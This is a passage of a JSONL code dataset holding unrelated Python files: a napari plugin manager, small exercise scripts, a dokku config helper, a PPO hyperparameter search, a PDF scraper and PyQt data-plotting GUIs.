convention.\n\n Parameters\n ----------\n project_name : str, optional\n Namespace for plugins managed by this manager. by default 'napari'.\n autodiscover : bool or str, optional\n Whether to autodiscover plugins by naming convention and setuptools\n entry_points. If a string is provided, it is added to sys.path\n before importing, and removed at the end. Any other \"truthy\" value\n will simply search the current sys.path. by default True\n \"\"\"\n super().__init__(project_name)\n self.hook = _HookRelay(self)\n # a dict to store package metadata for each plugin, will be populated\n # during self._register_module\n # possible keys for this dict will be set by fetch_module_metadata()\n self._plugin_meta: Dict[str, Dict[str, str]] = dict()\n\n # project_name might not be napari if running tests\n if project_name == 'napari':\n # define hook specifications and validators\n self.add_hookspecs(hook_specifications)\n # register our own builtin plugins\n self.register(_builtins, name='builtins')\n\n self.hook._needs_discovery = True\n # discover external plugins\n if autodiscover:\n if isinstance(autodiscover, str):\n self.discover(autodiscover)\n else:\n self.discover()\n\n @property\n def hooks(self):\n \"\"\"An alias for PluginManager.hook\"\"\"\n return self.hook\n\n def discover(self, path: Optional[str] = None) -> int:\n \"\"\"Discover modules by both naming convention and entry_points\n\n 1) Using naming convention:\n plugins installed in the environment that follow a naming\n convention (e.g. \"napari_plugin\"), can be discovered using\n `pkgutil`. This also enables easy discovery on pypi\n\n 2) Using package metadata:\n plugins that declare a special key (self.PLUGIN_ENTRYPOINT) in\n their setup.py `entry_points`. discovered using `pkg_resources`.\n\n https://packaging.python.org/guides/creating-and-discovering-plugins/\n\n Parameters\n ----------\n path : str, optional\n If a string is provided, it is added to sys.path before importing,\n and removed at the end. by default True\n\n Returns\n -------\n count : int\n The number of plugin modules successfully loaded.\n \"\"\"\n if path is None:\n self.hook._needs_discovery = False\n\n # allow debugging escape hatch\n if os.environ.get(\"NAPARI_DISABLE_PLUGINS\"):\n import warnings\n\n warnings.warn(\n 'Plugin discovery disabled due to '\n 'environmental variable \"NAPARI_DISABLE_PLUGINS\"'\n )\n return 0\n\n if path:\n sys.path.insert(0, path)\n\n count = 0\n for plugin_name, module_name, meta in iter_plugin_modules(\n prefix=self.PLUGIN_PREFIX, group=self.PLUGIN_ENTRYPOINT\n ):\n if self.get_plugin(plugin_name) or self.is_blocked(plugin_name):\n continue\n try:\n self._register_module(plugin_name, module_name, meta)\n count += 1\n except PluginError as exc:\n logger.error(exc.format_with_contact_info())\n self.unregister(name=plugin_name)\n except Exception as exc:\n logger.error(\n f'Unexpected error loading plugin \"{plugin_name}\": {exc}'\n )\n self.unregister(name=plugin_name)\n\n if count:\n msg = f'loaded {count} plugins:\\n '\n msg += \"\\n \".join([n for n, m in self.list_name_plugin()])\n logger.info(msg)\n\n if path:\n sys.path.remove(path)\n\n return count\n\n def _register_module(\n self, plugin_name: str, module_name: str, meta: Optional[dict] = None\n ):\n \"\"\"Try to register `module_name` as a plugin named `plugin_name`.\n\n Parameters\n ----------\n plugin_name : str\n The name given to the plugin in the plugin manager.\n module_name : str\n The importable module name\n meta : dict, optional\n Metadata to be associated with ``plugin_name``.\n\n Raises\n ------\n PluginImportError\n If an error is raised when trying to import `module_name`\n PluginRegistrationError\n If an error is raised when trying to register the plugin (such as\n a PluginValidationError.)\n \"\"\"\n if meta:\n meta.update({'plugin': plugin_name})\n self._plugin_meta[plugin_name] = meta\n try:\n mod = importlib.import_module(module_name)\n except Exception as exc:\n raise PluginImportError(plugin_name, module_name) from exc\n try:\n # prevent double registration (e.g. from entry_points)\n if self.is_registered(mod):\n return\n self.register(mod, name=plugin_name)\n except Exception as exc:\n raise PluginRegistrationError(plugin_name, module_name) from exc\n\n def register(self, plugin: ModuleType, name=None):\n \"\"\"Register a plugin and return its canonical name or ``None``.\n\n Parameters\n ----------\n plugin : ModuleType\n The module to register\n name : str, optional\n Optional name for plugin, by default ``get_canonical_name(plugin)``\n\n Returns\n -------\n str or None\n canonical plugin name, or ``None`` if the name is blocked from\n registering.\n\n Raises\n ------\n ValueError\n if the plugin is already registered.\n \"\"\"\n plugin_name = name or self.get_canonical_name(plugin)\n\n if (\n plugin_name in self._name2plugin\n or plugin in self._plugin2hookcallers\n ):\n if self._name2plugin.get(plugin_name, -1) is None:\n # blocked plugin, return None to indicate no registration\n return\n raise ValueError(\n \"Plugin already registered: %s=%s\\n%s\"\n % (plugin_name, plugin, self._name2plugin)\n )\n\n # XXX if an error happens we should make sure no state has been\n # changed at point of return\n self._name2plugin[plugin_name] = plugin\n\n # register matching hook implementations of the plugin\n self._plugin2hookcallers[plugin] = hookcallers = []\n for name in dir(plugin):\n hookimpl_opts = self.parse_hookimpl_opts(plugin, name)\n if hookimpl_opts is not None:\n pluggy.hooks.normalize_hookimpl_opts(hookimpl_opts)\n method = getattr(plugin, name)\n hookimpl = pluggy.manager.HookImpl(\n plugin, plugin_name, method, hookimpl_opts\n )\n name = hookimpl_opts.get(\"specname\") or name\n hook = getattr(self.hook, name, None)\n if hook is None:\n hook = _HookCaller(name, self._hookexec)\n setattr(self.hook, name, hook)\n elif hook.has_spec():\n self._verify_hook(hook, hookimpl)\n hook._maybe_apply_history(hookimpl)\n hook._add_hookimpl(hookimpl)\n hookcallers.append(hook)\n return plugin_name\n\n\ndef entry_points_for(\n group: str,\n) -> Generator[\n Tuple[importlib_metadata.Distribution, importlib_metadata.EntryPoint],\n None,\n None,\n]:\n \"\"\"Yield all entry_points matching \"group\", from any distribution.\n\n Distribution here refers more specifically to the information in the\n dist-info folder that usually accompanies an installed package. If a\n package in the environment does *not* have a ``dist-info/entry_points.txt``\n file, then it will not be discovered by this function.\n\n Note: a single package may provide multiple entrypoints for a given group.\n\n Parameters\n ----------\n group : str\n The name of the entry point to search.\n\n Yields\n -------\n tuples\n (Distribution, EntryPoint) objects for each matching EntryPoint\n that matches the provided ``group`` string.\n\n Example\n -------\n >>> list(entry_points_for('napari.plugin'))\n [(,\n EntryPoint(name='napari-reg',value='napari_reg',group='napari.plugin')),\n (,\n EntryPoint(name='myplug',value='another.module',group='napari.plugin'))]\n \"\"\"\n for dist in importlib_metadata.distributions():\n for ep in dist.entry_points:\n if ep.group == group:\n yield dist, ep\n\n\ndef modules_starting_with(prefix: str) -> Generator[str, None, None]:\n \"\"\"Yield all module names in sys.path that begin with `prefix`.\n\n Parameters\n ----------\n prefix : str\n The prefix to search\n\n Yields\n -------\n module_name : str\n Yields names of modules that start with prefix\n\n \"\"\"\n for finder, name, ispkg in pkgutil.iter_modules():\n if name.startswith(prefix):\n yield name\n\n\ndef iter_plugin_modules(\n prefix: Optional[str] = None, group: Optional[str] = None\n) -> Generator[Tuple[str, str, dict], None, None]:\n \"\"\"Discover plugins using naming convention and/or entry points.\n\n This function makes sure that packages that *both* follow the naming\n convention (i.e. starting with `prefix`) *and* provide and an entry point\n `group` will only be yielded once. Precedence is given to entry points:\n that is, if a package satisfies both critera, only the modules specifically\n listed in the entry points will be yielded. These MAY or MAY NOT be the\n top level module in the package... whereas with naming convention, it is\n always the top level module that gets imported and registered with the\n plugin manager.\n\n The NAME of yielded plugins will be the name of the package provided in\n the package METADATA file when found. This allows for the possibility that\n the plugin name and the module name are not the same: for instance...\n (\"napari-plugin\", \"napari_plugin\").\n\n Plugin packages may also provide multiple entry points, which will be\n registered as plugins of different names. For instance, the following\n ``setup.py`` entry would register two plugins under the names\n ``myplugin.register`` and ``myplugin.segment``\n\n .. code-block:: python\n\n import sys\n\n setup(\n name=\"napari-plugin\",\n entry_points={\n \"napari.plugin\": [\n \"myplugin.register = napari_plugin.registration\",\n \"myplugin.segment = napari_plugin.segmentation\"\n ],\n },\n packages=find_packages(),\n )\n\n\n Parameters\n ----------\n prefix : str, optional\n A prefix by which to search module names. If None, discovery by naming\n convention is disabled., by default None\n group : str, optional\n An entry point group string to search. If None, discovery by Entry\n Points is disabled, by default None\n\n Yields\n -------\n plugin_info : tuple\n (plugin_name, module_name, metadata)\n \"\"\"\n seen_modules = set()\n if group and not os.environ.get(\"NAPARI_DISABLE_ENTRYPOINT_PLUGINS\"):\n for dist, ep in entry_points_for(group):\n match = ep.pattern.match(ep.value)\n if match:\n module = match.group('module')\n seen_modules.add(module.split(\".\")[0])\n yield ep.name, module, fetch_module_metadata(dist)\n if prefix and not os.environ.get(\"NAPARI_DISABLE_NAMEPREFIX_PLUGINS\"):\n for module in modules_starting_with(prefix):\n if module not in seen_modules:\n try:\n name = importlib_metadata.metadata(module).get('Name')\n except Exception:\n name = None\n yield name or module, module, fetch_module_metadata(module)\n","sub_path":"napari/plugins/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":14462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"212700664","text":"def phy(vs):\n xc = yc = zc = 0\n for v in vs:\n xc += v[0]\n yc += v[1]\n zc += v[2]\n if(xc==yc==zc==0):\n return \"YES\"\n else:\n return \"NO\"\nvs = []\nfor x in range(int(input())):\n v = list(map(int, input().split()))\n vs.append(v)\nprint(phy(vs))\n","sub_path":"Young Physicist.py","file_name":"Young Physicist.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"168437117","text":"import os\n\nimport click\n\n\ndef run_commands(command, app, env_dict):\n for env_name, env_value in env_dict.items():\n os.system(command.format(app_name=app, env_name=env_name, env_value=env_value))\n\n\ndef read_env_file(env):\n f = env.readlines()\n return {line.strip().split(\"=\")[0]: line.strip().split(\"=\")[1] for line in f}\n\n\n@click.command()\n@click.option(\n \"--app\",\n default=\"\",\n help=\"The name of your app, this is neccessary \"\n \"when your are using the dokku cli directly instead of the dokku-toolbet wrapper\",\n)\n@click.argument(\n \"env\", type=click.File(\"r\"),\n)\ndef set_dokku_app_envs(env, app):\n \"\"\"Simple program that set environment variables for a project deploy with dokku\n on a vps, taking the env file path as argument.\n \"\"\"\n\n command = (\n \"dokku config:set {app} {env_name}={env_value}\"\n if app\n else \"dt config:set {env_name}={env_value}\"\n )\n\n env_dict = read_env_file(env=env)\n\n if not env_dict:\n return\n\n run_commands(command, app, env_dict)\n\n # set random secret key and admin url, comment if not needed\n extra = {\n \"DJANGO_SECRET_KEY\": \"$(openssl rand -base64 64 | tr -dc 'A-HJ-NP-Za-km-z2-9')\",\n \"DJANGO_ADMIN_URL\": \"$(openssl rand -base64 4096 | tr -dc 'A-HJ-NP-Za-km-z2-9' | head -c 32)/\",\n \"PYTHONHASHSEED\": \"random\",\n }\n\n run_commands(command=command, app=app, env_dict=extra)\n\n\nif __name__ == \"__main__\":\n set_dokku_app_envs()\n","sub_path":"dokku_config.py","file_name":"dokku_config.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"19037604","text":"#10/8/14\r\n#This program will take a user input of the amount budgeted for a month.\r\n#A loop will prompt the user to enter each of the expenses for the month, and keep a total\r\n#The program will display the amount the user is over of under budget.\r\n\r\nbudget=int(input(\"Please enter your budget for this month: \"))\r\nnumExp=int(input(\"Please enter how many expenses you have: \"))\r\ncount=1\r\nsum=0\r\nwhile count<=numExp:\r\n expense=int(input(\"Please enter your expense: \"))\r\n sum=sum+expense\r\n count=count+1\r\nif sum>budget:\r\n print(\"You are over your budget of\", budget)\r\nelse:\r\n print(\"You are under your budget of\", budget)\r\n \r\n","sub_path":"Week 6 Py Labs/budgeting.py","file_name":"budgeting.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"649947716","text":"import gym\nimport pybullet_envs as pe\n\nfrom stable_baselines3 import PPO\n\n# import stable_baselines3\n\n# from stable_baselines3.ppo import MlpPolicy\nfrom stable_baselines3.common.evaluation import evaluate_policy\nimport numpy as np\nimport time\nfrom torch.nn import ReLU, Tanh\n\nimport pyhopper\n\n\ndef score_trained_model(model):\n final_rewards = []\n for i in range(20):\n obs = model.env.reset()\n done = False\n total_reward = 0\n while not done:\n action, _ = model.predict(obs, deterministic=True)\n obs, reward, done, _ = model.env.step(action)\n total_reward += reward\n final_rewards.append(total_reward)\n return np.mean(final_rewards)\n\n\ndef score_random():\n env = gym.make(\"CartPoleContinuousBulletEnv-v0\")\n\n final_rewards = []\n for i in range(20):\n obs = env.reset()\n total_reward = 0\n steps = 0\n done = False\n while not done:\n action = env.action_space.sample()\n obs, reward, done, _ = env.step(action)\n total_reward += reward\n steps += 1\n print(\"steps: \", steps)\n final_rewards.append(total_reward)\n return np.mean(final_rewards)\n\n\ndef render_trained_model(model):\n model.env.render()\n obs = model.env.reset()\n done = False\n while not done:\n action, _ = model.predict(obs)\n obs, reward, done, _ = model.env.step(action)\n # model.env.render()\n model.env.close()\n\n\ndef train_ppo(params, render=False):\n env = gym.make(\"CartPoleContinuousBulletEnv-v0\")\n try:\n model = PPO(\n \"MlpPolicy\",\n env,\n policy_kwargs={\n \"net_arch\": [\n {\n \"pi\": [params[\"size\"], params[\"size\"]],\n \"vf\": [params[\"size\"], params[\"size\"]],\n }\n ],\n \"activation_fn\": {\"relu\": ReLU, \"tanh\": Tanh}[params[\"activation\"]],\n \"normalize_images\": True,\n },\n learning_rate=params[\"lr\"],\n n_epochs=params[\"n_epochs\"],\n gae_lambda=params[\"gae_lambda\"],\n max_grad_norm=params[\"max_grad_norm\"],\n ent_coef=params[\"ent_coef\"],\n ).learn(40000)\n except (ValueError, ZeroDivisionError):\n raise pyhopper.CancelEvaluation()\n # score, _ = evaluate_policy(model, gym.make(\"AntBulletEnv-v0\"))\n # print(\"total reward: \", score)\n score = score_trained_model(model)\n # print(\"total reward: \", score)\n if render:\n print(\"total reward: \", score)\n render_trained_model(model)\n return score\n\n\nif __name__ == \"__main__\":\n print(\"Random\", score_random())\n # default_params = {\n # \"lr\": 0.0005,\n # \"n_epochs\": 10,\n # \"gae_lambda\": 0.95,\n # \"max_grad_norm\": 1,\n # \"ent_coef\": 0,\n # \"activation\": \"tanh\",\n # \"size\": 128,\n # }\n # start = time.time()\n # train_ppo(default_params)\n # took = time.time() - start\n # print(f\"Took {took/60:0.1f} minutes\")\n # import sys\n\n # sys.exit(1)\n search = pyhopper.Search(\n {\n \"lr\": pyhopper.float(0.005, 0.0001, log=True),\n \"n_epochs\": pyhopper.int(5, 20),\n \"gae_lambda\": pyhopper.choice([0.8, 0.9, 0.95, 0.99], is_ordinal=True),\n \"max_grad_norm\": pyhopper.choice([0.1, 0.5, 1.0, 2.0], is_ordinal=True),\n \"ent_coef\": pyhopper.float(0, 0.2, precision=1),\n \"activation\": pyhopper.choice([\"tanh\", \"relu\"]),\n \"size\": pyhopper.int(64, 256, power_of=2),\n }\n )\n best_params = search.run(\n pyhopper.wrap_n_times(train_ppo, n=3, yield_after=0),\n # train_ppo,\n direction=\"max\",\n timeout=\"4h\",\n n_jobs=\"4x per-gpu\",\n canceler=pyhopper.cancelers.QuantileCanceler(0.6),\n )\n print(\"best_params\", best_params)\n train_ppo(best_params, render=True)\n\n# ============================ Summary ===========================\n# Mode : Best f : Steps : Canceled : Time\n# ---------------- : ---- : ---- : ---- : ----\n# Initial solution : 200 : 1 : 0 : 08:32 (m:s)\n# Random seeding : 200 : 32 : 16 : 03:32:42 (h:m:s)\n# Local sampling : 200 : 118 : 19 : 10:32:28 (h:m:s)\n# ---------------- : ---- : ---- : ---- : ----\n# Total : 200 : 151 : 35 : 03:57:31 (h:m:s)\n# ================================================================\n# best_params {'lr': 0.0017706780889095847, 'n_epochs': 8, 'gae_lambda': 0.9, 'max_grad_norm': 2.0, 'ent_coef': 0.1, 'activation': 'tanh', 'size': 64}","sub_path":"examples/ppo_ipend.py","file_name":"ppo_ipend.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"60845545","text":"def z4():\n for frame_i in range(imageframe_nmbr):\n if os.path.isfile(output_dir + 'Cells' + str(frame_i) + '.hdf5'):\n try:\n cell_reset = eval(input('Reset cells? [0, no]; 1, yes. '))\n except SyntaxError:\n cell_reset = 0\n \n if not cell_reset:\n continue\n \n print('Creating Cells' + str(frame_i) + '.hdf5.') \n \n with h5py.File(output_dir + 'brain_mask' + str(frame_i) + '.hdf5', 'r') as file_handle:\n blok_nmbr = file_handle['blok_nmbr'][()]\n blok_lidx = file_handle['blok_lidx'][()]\n \n cell_dir = output_dir + 'cell_series/' + str(frame_i)\n Cmpn_position = []\n Cmpn_spcesers = []\n Cmpn_timesers = []\n for blok_i in range(blok_nmbr):\n try:\n with h5py.File(cell_dir + '/Block' + str(blok_i).zfill(5) + '.hdf5', 'r') as file_handle:\n for cmpn_i in file_handle['cmpn']:\n Cmpn_position.append(file_handle['cmpn'][cmpn_i]['cmpn_position'][()])\n Cmpn_spcesers.append(file_handle['cmpn'][cmpn_i]['cmpn_spcesers'][()])\n Cmpn_timesers.append(file_handle['cmpn'][cmpn_i]['cmpn_timesers'][()])\n except KeyError:\n print('Block %d is empty.' %blok_i)\n except IOError:\n if blok_lidx[blok_i]:\n print('Block %d does not exist.' %blok_i)\n \n cn = len(Cmpn_position)\n ln = np.max([len(i) for i in Cmpn_spcesers])\n Cmpn_position_array = np.full((cn, ln, 3), -1, dtype=int)\n Cmpn_spcesers_array = np.full((cn, ln ), np.nan)\n for i in range(cn):\n j = len(Cmpn_spcesers[i])\n Cmpn_position_array[i, :j] = Cmpn_position[i]\n Cmpn_spcesers_array[i, :j] = Cmpn_spcesers[i]\n Cmpn_timesers_array = np.array(Cmpn_timesers)\n \n with h5py.File(output_dir + 'Cells' + str(frame_i) + '.hdf5', 'w') as file_handle:\n file_handle['Cmpn_position'] = Cmpn_position_array\n file_handle['Cmpn_spcesers'] = Cmpn_spcesers_array\n file_handle['Cmpn_timesers'] = Cmpn_timesers_array\n \n file_handle['freq'] = freq_stack\n file_handle['resn'] = np.array([resn_x, resn_x, resn_y, ds])\n file_handle['dims'] = np.array([lx//ds, ly//ds, lz, lt])\n \nz4()\n","sub_path":"z4_cell_collect.py","file_name":"z4_cell_collect.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"557993287","text":"from .scrappers import ScrapeInlineData, ScrapeTableData, ScrapeHeadData\nfrom .utils import PdfReader, PdfDataContainer\n\n\nclass PdfScrapper:\n pdf_reader = PdfReader()\n pdf_scrapper_inline_data = ScrapeInlineData()\n pdf_scrapper_table_data = ScrapeTableData()\n pdf_scrapper_head_data = ScrapeHeadData()\n\n def set_data(self, path: str) -> None:\n PdfDataContainer.pdf_path = path\n\n pdf_query_data = self.pdf_reader.read_pdf(path)\n\n if pdf_query_data:\n PdfDataContainer.pdfquery = pdf_query_data.get('pdf')\n PdfDataContainer.width = pdf_query_data.get('width')\n PdfDataContainer.height = pdf_query_data.get('height')\n PdfDataContainer.pages_count = self.pdf_reader.pages_count(PdfDataContainer.pdfquery)\n\n def set_inline_data(self, data: list) -> None:\n PdfDataContainer.inline_data_structure = data\n\n def set_table_data(self, data: list):\n PdfDataContainer.table_data_structure = data\n\n def set_invalid_fields_data(self, data: list):\n PdfDataContainer.invalid_fields = data\n\n def set_mail_data(self, email_to, email_from, password, port, host):\n PdfDataContainer.email_to = email_to\n PdfDataContainer.email_from = email_from\n PdfDataContainer.email_from_password = password\n PdfDataContainer.email_host = host\n PdfDataContainer.email_port = port\n\n def scrape_inline_data(self, page, schema):\n if PdfDataContainer.pdfquery is None:\n return\n\n self.set_inline_data(schema)\n return self.pdf_scrapper_inline_data.scrape(page)\n\n def scrape_table_data(self, page, schema):\n if PdfDataContainer.pdfquery is None:\n return\n\n self.set_table_data(schema)\n return self.pdf_scrapper_table_data.scrape(page)\n\n def set_logger(self, logger):\n PdfDataContainer.logger = logger\n\n def _validate_dict(self, data: dict):\n structure = {}\n for k, v in data.items():\n errors_line = ''\n for ivl_field in PdfDataContainer.invalid_fields:\n if ivl_field in v:\n errors_line += f\"contains {ivl_field}; \"\n if errors_line:\n structure[k] = errors_line\n return structure\n\n def validate_scrapping_data(self, scrapping_data):\n errors = []\n\n for s in scrapping_data:\n data = scrapping_data[s]\n\n structure = {}\n if isinstance(data, dict):\n validation_res = self._validate_dict(data)\n if validation_res:\n structure[s] = validation_res\n else:\n list_errors = []\n for d in data:\n validation_res = self._validate_dict(d)\n if validation_res:\n list_errors.append(validation_res)\n if list_errors:\n structure[s] = list_errors\n\n if structure:\n errors.append(structure)\n\n return errors\n\n def scrape_all_data(self, page=None) -> dict or None:\n if PdfDataContainer.pdfquery is None:\n return\n\n results = self.pdf_scrapper_head_data.scrape(page)\n\n scrapping_data = {}\n for res in results:\n scrapping_data.update(self.scrape_inline_data(\n page=res.get('page'),\n schema=res.get('inline')\n ))\n scrapping_data.update(self.scrape_table_data(\n page=res.get('page'),\n schema=res.get('table')\n ))\n\n PdfDataContainer.logger.log(10, {'Errors': self.validate_scrapping_data(scrapping_data)})\n\n return scrapping_data\n","sub_path":"venv/Lib/site-packages/pdftodict/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"339081946","text":"import numpy as np\r\n\r\n\r\nif __name__ == '__main__':\r\n inpath = '../../data/amazon/review/info/info.txt'\r\n outpath = '../../data/amazon/review/info/info.csv'\r\n with open(outpath, 'w') as f:\r\n f.write('dataset,u,i,density,inter\\n')\r\n info = open(inpath)\r\n row = 0\r\n d = [0, 0, 0]\r\n for line in info.readlines():\r\n if row < 4:\r\n row += 1\r\n continue\r\n if row % 4 == 0:\r\n row += 1\r\n with open(outpath, 'a') as f:\r\n f.write(line[:-1] + ',')\r\n elif row % 4 == 2:\r\n row += 1\r\n sp = line.split(']')\r\n d[0] = sp[0][3:]\r\n d[1] = sp[1][3:]\r\n d[2] = sp[2][9:]\r\n with open(outpath, 'a') as f:\r\n f.write(d[0] + ',' + d[1] + ',' + d[2] + ',' +\r\n str(round(int(d[0])*int(d[1])*float(d[2])*0.01)) + '\\n')\r\n else:\r\n row += 1\r\n","sub_path":"amazon/review/fmtinfo.py","file_name":"fmtinfo.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"617700038","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport sys,datetime,json,pickle,os,time\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtGui import QIcon\nimport sixSigmaCalcFloatLine as SSCFL\nimport sixSigmaCalcFloatBar as SSCFB\nimport sixSigmaCalcFloatPercentChangeChart as SSCFPCC\nimport csvMaker as csvMaker\nfrom tkinter import *\nfrom tkinter.filedialog import askopenfilename\n\n\n\n#choose what graph to run\nclass sinkChooseGraphType(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(441, 412)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.veiwLineGraphFloatButton = QtWidgets.QPushButton(self.centralwidget)\n self.veiwLineGraphFloatButton.setGeometry(QtCore.QRect(10, 80, 411, 31))\n self.veiwLineGraphFloatButton.setObjectName(\"veiwLineGraphFloatButton\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(10, 100, 411, 51))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label.setFont(font)\n self.label.setWordWrap(True)\n self.label.setObjectName(\"label\")\n self.veiwBarGraphFloatButton = QtWidgets.QPushButton(self.centralwidget)\n self.veiwBarGraphFloatButton.setGeometry(QtCore.QRect(10, 150, 411, 31))\n self.veiwBarGraphFloatButton.setObjectName(\"veiwBarGraphFloatButton\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(10, 160, 411, 81))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_2.setFont(font)\n self.label_2.setWordWrap(True)\n self.label_2.setObjectName(\"label_2\")\n self.veiwLPercentageChangeFloatButton = QtWidgets.QPushButton(self.centralwidget)\n self.veiwLPercentageChangeFloatButton.setGeometry(QtCore.QRect(10, 230, 411, 31))\n self.veiwLPercentageChangeFloatButton.setObjectName(\"veiwLPercentageChangeFloatButton\")\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(10, 240, 411, 81))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_3.setFont(font)\n self.label_3.setWordWrap(True)\n self.label_3.setObjectName(\"label_3\")\n self.returnToFloatMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.returnToFloatMenuButton.setGeometry(QtCore.QRect(10, 310, 411, 31))\n self.returnToFloatMenuButton.setObjectName(\"returnToFloatMenuButton\")\n self.label_4 = QtWidgets.QLabel(self.centralwidget)\n self.label_4.setGeometry(QtCore.QRect(10, 330, 411, 51))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_4.setFont(font)\n self.label_4.setWordWrap(True)\n self.label_4.setObjectName(\"label_4\")\n self.label_5 = QtWidgets.QLabel(self.centralwidget)\n self.label_5.setGeometry(QtCore.QRect(40, 30, 381, 20))\n font = QtGui.QFont()\n font.setPointSize(15)\n self.label_5.setFont(font)\n self.label_5.setObjectName(\"label_5\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(10, 50, 411, 20))\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(3)\n self.line.setMidLineWidth(3)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 441, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.returnToFloatMenuButton.clicked.connect(self.backButtonPressed)\n \n self.veiwLineGraphFloatButton.clicked.connect(self.veiwLineGraphPressed)\n self.veiwBarGraphFloatButton.clicked.connect(self.veiwBarGraphPressed)\n self.veiwLPercentageChangeFloatButton.clicked.connect(self.veiwSTDGraphPressed)\n\n #go back to add data point menu\n @staticmethod\n def backButtonPressed(self):\n runClass(\"floatMainMenu\")\n \n #veiw Linegraph\n @staticmethod\n def veiwLineGraphPressed(self):\n csvMaker.create(\"floatData.txt\")\n SSCFL.call()#six sigma calc float line graph \n\n #veiw BarGraph\n @staticmethod\n def veiwBarGraphPressed(self):\n print(\"hi\")\n csvMaker.create(\"floatData.txt\")\n SSCFB.call()#six sigma calc float bar graph \n\n #veiw std graph\n @staticmethod\n def veiwSTDGraphPressed(self):\n csvMaker.create(\"floatData.txt\")\n SSCFPCC.call()#six sigma calc float bar graph \n\n\n\n\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.veiwLineGraphFloatButton.setText(_translate(\"MainWindow\", \"Veiw Floating Percentage Data Line Graph\"))\n self.label.setText(_translate(\"MainWindow\", \"Default graph. Contains UCL and LCL data for floating data percentages in a detailed line graph\"))\n self.veiwBarGraphFloatButton.setText(_translate(\"MainWindow\", \"Veiw Floating Distribution Bar Graph\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Bar graph that shows the distribution of the percent of floating plastic versus the sinking plastic percentage.\"))\n self.veiwLPercentageChangeFloatButton.setText(_translate(\"MainWindow\", \"Veiw Floating Percentage Deviation Graph\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Graph that shows distrubitons from the mean of the dataset. Can be used as another way to analyze data from the line graph.\"))\n self.returnToFloatMenuButton.setText(_translate(\"MainWindow\", \"Return to Float menu\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Return to previous menu.\"))\n self.label_5.setText(_translate(\"MainWindow\", \"How would you like to veiw your data?\"))\n\n\n#main menu for float data\nclass sinkMainMenu(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(294, 283)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.viewGraphButton = QtWidgets.QPushButton(self.centralwidget)\n self.viewGraphButton.setGeometry(QtCore.QRect(20, 110, 260, 31))\n self.viewGraphButton.setObjectName(\"viewGraphButton\")\n \n self.settingsButton = QtWidgets.QPushButton(self.centralwidget)\n self.settingsButton.setGeometry(QtCore.QRect(20, 190, 260, 31))\n self.settingsButton.setObjectName(\"settingsButton\")\n self.quitToSelectButton = QtWidgets.QPushButton(self.centralwidget)\n self.quitToSelectButton.setGeometry(QtCore.QRect(150, 230, 131, 31))\n self.quitToSelectButton.setObjectName(\"quitToSelectButton\")\n self.editDataPointButton = QtWidgets.QPushButton(self.centralwidget)\n self.editDataPointButton.setGeometry(QtCore.QRect(20, 150, 260, 31))\n self.editDataPointButton.setObjectName(\"editDataPointButton\")\n self.addNewDPandGraphButton = QtWidgets.QPushButton(self.centralwidget)\n self.addNewDPandGraphButton.setGeometry(QtCore.QRect(20, 70, 260, 31))\n self.addNewDPandGraphButton.setObjectName(\"addNewDPandGraphButton\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(20, 40, 260, 31))\n font = QtGui.QFont()\n font.setBold(False)\n font.setWeight(50)\n self.line.setFont(font)\n 